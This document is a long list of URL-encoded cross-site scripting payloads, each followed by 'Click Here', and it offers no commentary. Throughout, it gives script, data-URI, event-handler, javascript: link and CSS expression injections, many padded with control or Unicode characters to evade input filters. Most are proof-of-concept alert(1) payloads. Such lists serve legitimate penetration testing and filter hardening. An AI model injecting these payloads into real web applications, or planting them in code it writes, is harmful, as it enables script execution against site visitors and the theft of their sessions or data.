%3cscript%2fsrc%3ddata%26colon%3btext%2fj%5cu0061v%5cu0061%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116,%5cu0061%6C%65%72%74(%2fXSS%2f)%3e%3c%2fscriptClick Here

%3cscript%2fsrc%3d%22data%26colon%3btext%2Fj%5cu0061v%5cu0061script,%5cu0061lert('%5cu0061')%22%3e%3c%2fscript%20a%3d%5cu0061%20%26%20%2f%3d%2FClick Here

%3cobject%20data%3djavascript%26colon%3b%5cu0061%26%23x6C%3b%26%23101%72t(1)%3eClick Here

%3cscript%3e%2b-%2b-1-%2b-%2balert(1)%3c%2fscript%3eClick Here

%3cimg%20src%20%3fitworksonchrome%3f%5c%2fonerror%20%3d%20alert(1)Click Here

%3cbody%2fonload%3d%26lt%3b!--%26gt%3b%26%2310alert(1)%3eClick Here

%3cscript%20itworksinallbrowsers%3e%2f%2a%3cscript%2a%20%2a%2falert(1)%3c%2fscriptClick Here

%3csvg%3e%3cscript%3e%2f%2f%26NewLine%3bconfirm(1)%3b%3c%2fscript%20%3c%2fsvg%3eClick Here

%3csvg%3e%3cscript%20onlypossibleinopera%3a-)%3e%20alert(1)Click Here

%3cdiv%2fonmouseover%3d'alert(1)'%3e%20style%3d%22x%3a%22%3eClick Here

%3cscript%20x%3e%20alert(1)%20%3c%2fscript%201%3d2Click Here

%3ca%20aa%20aaa%20aaaa%20aaaaa%20aaaaaa%20aaaaaaa%20aaaaaaaa%20aaaaaaaaa%20aaaaaaaaaa%20href%3dj%26%2397v%26%2397script%26%23x3A%3b%26%2397lert(1)%3eClickMeClick Here

%3c--%60%3cimg%2fsrc%3d%60%20onerror%3dalert(1)%3e%20--!%3eClick Here

%3cscript%2fsrc%3d%26%23100%26%2397%26%23116%26%2397%3atext%2f%26%23x6a%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x000070%26%23x074,%26%23x0061%3b%26%23x06c%3b%26%23x0065%3b%26%23x00000072%3b%26%23x00074%3b(1)%3e%3c%2fscript%3eClick Here

%3cdiv%20style%3d%22position%3aabsolute%3btop%3a0%3bleft%3a0%3bwidth%3a100%%3bheight%3a100%%22%20onmouseover%3d%22prompt(1)%22%20onclick%3d%22alert(1)%22%3ex%3c%2fbutton%3eClick Here

%22%3e%3cimg%20src%3dx%20onerror%3dwindow%2eopen('https%3a%2f%2fwww%2egoogle%2ecom%2f')%3b%3eClick Here

%3cform%3e%3cbutton%20formaction%3djavascript%26colon%3balert(1)%3eCLICKMEClick Here

%3cobject%20data%3ddata%3atext%2fhtml%3bbase64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik%2b%3e%3c%2fobject%3eClick Here

%3cmath%3e%3ca%20xlink%3ahref%3d%22%2f%2fjsfiddle%2enet%2ft846h%2f%22%3eclickClick Here

%3cscript%5cx20type%3d%22text%2fjavascript%22%3ejavascript%3aalert(1)%3b%3c%2fscript%3eClick Here

%3ciframe%20src%3d%22data%3atext%2fhtml,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E%22%3e%3c%2fiframe%3eClick Here

%3cscript%5cx0Dtype%3d%22text%2fjavascript%22%3ejavascript%3aalert(1)%3b%3c%2fscript%3eClick Here

%3cscript%5cx09type%3d%22text%2fjavascript%22%3ejavascript%3aalert(1)%3b%3c%2fscript%3eClick Here

%3cscript%5cx3Etype%3d%22text%2fjavascript%22%3ejavascript%3aalert(1)%3b%3c%2fscript%3eClick Here

%3cscript%5cx0Ctype%3d%22text%2fjavascript%22%3ejavascript%3aalert(1)%3b%3c%2fscript%3eClick Here

%3cscript%5cx2Ftype%3d%22text%2fjavascript%22%3ejavascript%3aalert(1)%3b%3c%2fscript%3eClick Here

'%60%22%3e%3c%5cx3Cscript%3ejavascript%3aalert(1)%3c%2fscript%3e%20%20%20%20%20%20%20%20Click Here

%3cscript%5cx0Atype%3d%22text%2fjavascript%22%3ejavascript%3aalert(1)%3b%3c%2fscript%3eClick Here

'%60%22%3e%3c%5cx00script%3ejavascript%3aalert(1)%3c%2fscript%3eClick Here

%3cimg%20src%3d1%20href%3d1%20onerror%3d%22javascript%3aalert(1)%22%3e%3c%2fimg%3eClick Here

%3cbody%20src%3d1%20href%3d1%20onerror%3d%22javascript%3aalert(1)%22%3e%3c%2fbody%3eClick Here

%3caudio%20src%3d1%20href%3d1%20onerror%3d%22javascript%3aalert(1)%22%3e%3c%2faudio%3eClick Here

%3cvideo%20src%3d1%20href%3d1%20onerror%3d%22javascript%3aalert(1)%22%3e%3c%2fvideo%3eClick Here

%3cimage%20src%3d1%20href%3d1%20onerror%3d%22javascript%3aalert(1)%22%3e%3c%2fimage%3eClick Here

%3cobject%20src%3d1%20href%3d1%20onerror%3d%22javascript%3aalert(1)%22%3e%3c%2fobject%3eClick Here

%3cscript%20src%3d1%20href%3d1%20onerror%3d%22javascript%3aalert(1)%22%3e%3c%2fscript%3eClick Here

%3ctitle%20onPropertyChange%20title%20onPropertyChange%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2ftitle%20onPropertyChange%3eClick Here

%3csvg%20onResize%20svg%20onResize%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fsvg%20onResize%3eClick Here

%3ciframe%20onLoad%20iframe%20onLoad%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fiframe%20onLoad%3eClick Here

%3cbody%20onMouseEnter%20body%20onMouseEnter%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbody%20onMouseEnter%3eClick Here

%3cbody%20onFocus%20body%20onFocus%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbody%20onFocus%3eClick Here

%3cscript%20onReadyStateChange%20script%20onReadyStateChange%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fscript%20onReadyStateChange%3eClick Here

%3chtml%20onMouseUp%20html%20onMouseUp%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fhtml%20onMouseUp%3eClick Here

%3cframeset%20onScroll%20frameset%20onScroll%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fframeset%20onScroll%3eClick Here

%3cbody%20onPropertyChange%20body%20onPropertyChange%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbody%20onPropertyChange%3eClick Here

%3csvg%20onLoad%20svg%20onLoad%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fsvg%20onLoad%3eClick Here

%3cbody%20onPageHide%20body%20onPageHide%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbody%20onPageHide%3eClick Here

%3cbody%20onUnload%20body%20onUnload%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbody%20onUnload%3eClick Here

%3cbody%20onMouseOver%20body%20onMouseOver%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbody%20onMouseOver%3eClick Here

%3cbody%20onLoad%20body%20onLoad%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbody%20onLoad%3eClick Here

%3cbgsound%20onPropertyChange%20bgsound%20onPropertyChange%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbgsound%20onPropertyChange%3eClick Here

%3chtml%20onMouseWheel%20html%20onMouseWheel%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fhtml%20onMouseWheel%3eClick Here

%3chtml%20onMouseLeave%20html%20onMouseLeave%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fhtml%20onMouseLeave%3eClick Here

%3cstyle%20onLoad%20style%20onLoad%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fstyle%20onLoad%3eClick Here

%3ciframe%20onReadyStateChange%20iframe%20onReadyStateChange%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fiframe%20onReadyStateChange%3eClick Here

%3cbody%20onPageShow%20body%20onPageShow%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbody%20onPageShow%3eClick Here

%3cstyle%20onReadyStateChange%20style%20onReadyStateChange%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fstyle%20onReadyStateChange%3eClick Here

%3cframeset%20onFocus%20frameset%20onFocus%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fframeset%20onFocus%3eClick Here

%3capplet%20onError%20applet%20onError%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fapplet%20onError%3eClick Here

%3cmarquee%20onStart%20marquee%20onStart%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fmarquee%20onStart%3eClick Here

%3cscript%20onLoad%20script%20onLoad%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fscript%20onLoad%3eClick Here

%3chtml%20onMouseOver%20html%20onMouseOver%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fhtml%20onMouseOver%3eClick Here

%3cbody%20onBeforeUnload%20body%20onBeforeUnload%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbody%20onBeforeUnload%3eClick Here

%3chtml%20onMouseEnter%20html%20onMouseEnter%3d%22javascript%3aparent%2ejavascript%3aalert(1)%22%3e%3c%2fhtml%20onMouseEnter%3eClick Here

%3chtml%20onMouseDown%20html%20onMouseDown%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fhtml%20onMouseDown%3eClick Here

%3cmarquee%20onScroll%20marquee%20onScroll%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fmarquee%20onScroll%3eClick Here

%3cxml%20onPropertyChange%20xml%20onPropertyChange%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fxml%20onPropertyChange%3eClick Here

%3cframeset%20onBlur%20frameset%20onBlur%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fframeset%20onBlur%3eClick Here

%3capplet%20onReadyStateChange%20applet%20onReadyStateChange%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fapplet%20onReadyStateChange%3eClick Here

%3csvg%20onUnload%20svg%20onUnload%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fsvg%20onUnload%3eClick Here

%3chtml%20onMouseOut%20html%20onMouseOut%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fhtml%20onMouseOut%3eClick Here

%3cbody%20onMouseMove%20body%20onMouseMove%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbody%20onMouseMove%3eClick Here

%3cbody%20onResize%20body%20onResize%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbody%20onResize%3eClick Here

%3cobject%20onError%20object%20onError%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fobject%20onError%3eClick Here

%3chtml%20onMouseMove%20html%20onMouseMove%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fhtml%20onMouseMove%3eClick Here

%3cbody%20onPopState%20body%20onPopState%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbody%20onPopState%3eClick Here

%3cbody%20onpagehide%20body%20onpagehide%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbody%20onpagehide%3eClick Here

%3capplet%20onreadystatechange%20applet%20onreadystatechange%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fapplet%20onreadystatechange%3eClick Here

%3csvg%20onunload%20svg%20onunload%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fsvg%20onunload%3eClick Here

%3capplet%20onerror%20applet%20onerror%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fapplet%20onerror%3eClick Here

%3cbody%20onkeyup%20body%20onkeyup%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbody%20onkeyup%3eClick Here

%3ciframe%20onload%20iframe%20onload%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fiframe%20onload%3eClick Here

%3cbody%20onunload%20body%20onunload%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbody%20onunload%3eClick Here

%3cbody%20onload%20body%20onload%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbody%20onload%3eClick Here

%3chtml%20onmouseover%20html%20onmouseover%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fhtml%20onmouseover%3eClick Here

%3cobject%20onbeforeload%20object%20onbeforeload%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fobject%20onbeforeload%3eClick Here

%3cbody%20onbeforeunload%20body%20onbeforeunload%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbody%20onbeforeunload%3eClick Here

%3cbody%20onfocus%20body%20onfocus%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbody%20onfocus%3eClick Here

%3cbody%20onkeydown%20body%20onkeydown%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbody%20onkeydown%3eClick Here

%3ciframe%20onbeforeload%20iframe%20onbeforeload%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fiframe%20onbeforeload%3eClick Here

%3ciframe%20src%20iframe%20src%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fiframe%20src%3eClick Here

%3chtml%20onmousemove%20html%20onmousemove%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fhtml%20onmousemove%3eClick Here

%3cbody%20onblur%20body%20onblur%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbody%20onblur%3eClick Here

%3csvg%20onload%20svg%20onload%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fsvg%20onload%3eClick Here

'%22%60%3e%3cscript%3e%2f%2a%20%2a%5cx2Fjavascript%3aalert(1)%2f%2f%20%2a%2f%3c%2fscript%3eClick Here

%5cx3Cscript%3ejavascript%3aalert(1)%3c%2fscript%3eClick Here

%3cscript%3ejavascript%3aalert(1)%3c%2fscript%5cx0DClick Here

%3cscript%20charset%3d%22%5cx22%3ejavascript%3aalert(1)%3c%2fscript%3eClick Here

%3cscript%3ejavascript%3aalert(1)%3c%2fscript%5cx0BClick Here

%3c!--%5cx3E%3cimg%20src%3dxxx%3ax%20onerror%3djavascript%3aalert(1)%3e%20--%3eClick Here

%3cscript%3ejavascript%3aalert(1)%3c%2fscript%5cx0AClick Here

--%3e%3c!--%20---%3e%20%3cimg%20src%3dxxx%3ax%20onerror%3djavascript%3aalert(1)%3e%20--%3eClick Here

--%3e%3c!--%20--%5cx21%3e%20%3cimg%20src%3dxxx%3ax%20onerror%3djavascript%3aalert(1)%3e%20--%3eClick Here

--%3e%3c!--%20--%5cx3E%3e%20%3cimg%20src%3dxxx%3ax%20onerror%3djavascript%3aalert(1)%3e%20--%3eClick Here

--%3e%3c!--%20--%5cx00%3e%20%3cimg%20src%3dxxx%3ax%20onerror%3djavascript%3aalert(1)%3e%20--%3eClick Here

%60%22'%3e%3cimg%20src%3d'%23%5cx27%20onerror%3djavascript%3aalert(1)%3eClick Here

%3ca%20href%3d%22javascript%5cx3Ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%22'%60%3e%3cp%3e%3csvg%3e%3cscript%3ea%3d'hello%5cx27%3bjavascript%3aalert(1)%2f%2f'%3b%3c%2fscript%3e%3c%2fp%3eClick Here

%3ca%20href%3d%22javas%5cx00cript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22javas%5cx07cript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22javas%5cx0Dcript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22javas%5cx0Acript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22javas%5cx08cript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22javas%5cx02cript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22javas%5cx03cript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22javas%5cx04cript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22javas%5cx01cript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22javas%5cx05cript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22javas%5cx0Bcript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22javas%5cx06cript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22javas%5cx09cript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22javas%5cx0Ccript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3cscript%3e%2f%2a%20%2a%5cx2A%2fjavascript%3aalert(1)%2f%2f%20%2a%2f%3c%2fscript%3eClick Here

%3cscript%3e%2f%2a%20%2a%5cx00%2fjavascript%3aalert(1)%2f%2f%20%2a%2f%3c%2fscript%3eClick Here

%3cstyle%3e%3c%2fstyle%5cx3E%3cimg%20src%3d%22about%3ablank%22%20onerror%3djavascript%3aalert(1)%2f%2f%3e%3c%2fstyle%3eClick Here

%3cstyle%3e%3c%2fstyle%5cx0D%3cimg%20src%3d%22about%3ablank%22%20onerror%3djavascript%3aalert(1)%2f%2f%3e%3c%2fstyle%3eClick Here

%3cstyle%3e%3c%2fstyle%5cx20%3cimg%20src%3d%22about%3ablank%22%20onerror%3djavascript%3aalert(1)%2f%2f%3e%3c%2fstyle%3eClick Here

%3cstyle%3e%3c%2fstyle%5cx09%3cimg%20src%3d%22about%3ablank%22%20onerror%3djavascript%3aalert(1)%2f%2f%3e%3c%2fstyle%3eClick Here

%3cstyle%3e%3c%2fstyle%5cx0A%3cimg%20src%3d%22about%3ablank%22%20onerror%3djavascript%3aalert(1)%2f%2f%3e%3c%2fstyle%3eClick Here

%3cscript%3eif(%22x%5c%5cxE1%5cx96%5cx89%22%2elength%3d%3d2)%20%7b%20javascript%3aalert(1)%3b%7d%3c%2fscript%3eClick Here

%22'%60%3eABC%3cdiv%20style%3d%22font-family%3a'foo'%5cx3Bx%3aexpression(javascript%3aalert(1)%3b%2f%2a'%3b%22%3eDEF%20Click Here

%3cscript%3eif(%22x%5c%5cxE0%5cxB9%5cx92%22%2elength%3d%3d2)%20%7b%20javascript%3aalert(1)%3b%7d%3c%2fscript%3eClick Here

%22'%60%3eABC%3cdiv%20style%3d%22font-family%3a'foo'%5cx7Dx%3aexpression(javascript%3aalert(1)%3b%2f%2a'%3b%22%3eDEF%20Click Here

'%60%22%3e%3c%5cx3Cscript%3ejavascript%3aalert(1)%3c%2fscript%3eClick Here

'%60%22%3e%3c%5cx00script%3ejavascript%3aalert(1)%3c%2fscript%3eClick Here

%3cscript%3eif(%22x%5c%5cxEE%5cxA9%5cx93%22%2elength%3d%3d2)%20%7b%20javascript%3aalert(1)%3b%7d%3c%2fscript%3eClick Here

%22'%60%3e%3c%5cx00img%20src%3dxxx%3ax%20onerror%3djavascript%3aalert(1)%3eClick Here

%22'%60%3e%3c%5cx3Cimg%20src%3dxxx%3ax%20onerror%3djavascript%3aalert(1)%3eClick Here

%3cscript%20src%3d%22data%3atext%2fplain%5cx2Cjavascript%3aalert(1)%22%3e%3c%2fscript%3eClick Here

%3cscript%20src%3d%22data%3a%5cxD4%5cx8F,javascript%3aalert(1)%22%3e%3c%2fscript%3eClick Here

%3cscript%20src%3d%22data%3a%5cxCB%5cx8F,javascript%3aalert(1)%22%3e%3c%2fscript%3eClick Here

%3cscript%20src%3d%22data%3a%5cxE0%5cxA4%5cx98,javascript%3aalert(1)%22%3e%3c%2fscript%3eClick Here

%3cscript%5cx20type%3d%22text%2fjavascript%22%3ejavascript%3aalert(1)%3b%3c%2fscript%3eClick Here

%3cscript%5cx3Etype%3d%22text%2fjavascript%22%3ejavascript%3aalert(1)%3b%3c%2fscript%3eClick Here

%3cscript%5cx0Dtype%3d%22text%2fjavascript%22%3ejavascript%3aalert(1)%3b%3c%2fscript%3eClick Here

%3cscript%5cx09type%3d%22text%2fjavascript%22%3ejavascript%3aalert(1)%3b%3c%2fscript%3eClick Here

%3cscript%5cx0Atype%3d%22text%2fjavascript%22%3ejavascript%3aalert(1)%3b%3c%2fscript%3eClick Here

%3cscript%5cx0Ctype%3d%22text%2fjavascript%22%3ejavascript%3aalert(1)%3b%3c%2fscript%3eClick Here

%3cscript%5cx2Ftype%3d%22text%2fjavascript%22%3ejavascript%3aalert(1)%3b%3c%2fscript%3eClick Here

ABC%3cdiv%20style%3d%22x%5cx3Aexpression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3aexpression%5cx5C(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3aexpression%5cx00(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3aexp%5cx00ression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3a%5cx0Aexpression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3aexp%5cx5Cression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3a%5cxE3%5cx80%5cx80expression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3a%5cx09expression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3a%5cxC2%5cxA0expression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3a%5cxE2%5cx80%5cx80expression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3a%5cxE2%5cx80%5cx84expression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3a%5cxE2%5cx80%5cx8Aexpression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3a%5cx0Dexpression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3a%5cx0Cexpression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3a%5cxE2%5cx80%5cx87expression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3a%5cxEF%5cxBB%5cxBFexpression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3a%5cx20expression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3a%5cxE2%5cx80%5cx88expression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3a%5cx00expression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3a%5cxE2%5cx80%5cx85expression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3a%5cxE2%5cx80%5cx8Bexpression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3a%5cxE2%5cx80%5cx86expression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3a%5cx0Bexpression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3a%5cxE2%5cx80%5cx82expression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3a%5cxE2%5cx80%5cx81expression(javascript%3aalert(1)%22%3eDEFClick Here

%3ca%20href%3d%22%5cx0Bjavascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

ABC%3cdiv%20style%3d%22x%3a%5cxE2%5cx80%5cx89expression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3a%5cxE2%5cx80%5cx83expression(javascript%3aalert(1)%22%3eDEFClick Here

%3ca%20href%3d%22%5cx0Fjavascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cxC2%5cxA0javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx18javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cxE1%5cxA0%5cx8Ejavascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx11javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx05javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cxE2%5cx80%5cx88javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cxE2%5cx80%5cx89javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cxE2%5cx80%5cx80javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx17javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx03javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx0Ejavascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx00javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx10javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cxE2%5cx80%5cx82javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx1Ajavascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx20javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx13javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx09javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx14javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cxE2%5cx80%5cx8Ajavascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx19javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cxE2%5cx80%5cxAFjavascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cxE2%5cx80%5cx81javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx1Fjavascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx1Djavascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cxE2%5cx80%5cx87javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx07javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cxE1%5cx9A%5cx80javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cxE2%5cx80%5cx83javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx01javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx04javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx08javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cxE2%5cx80%5cx84javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

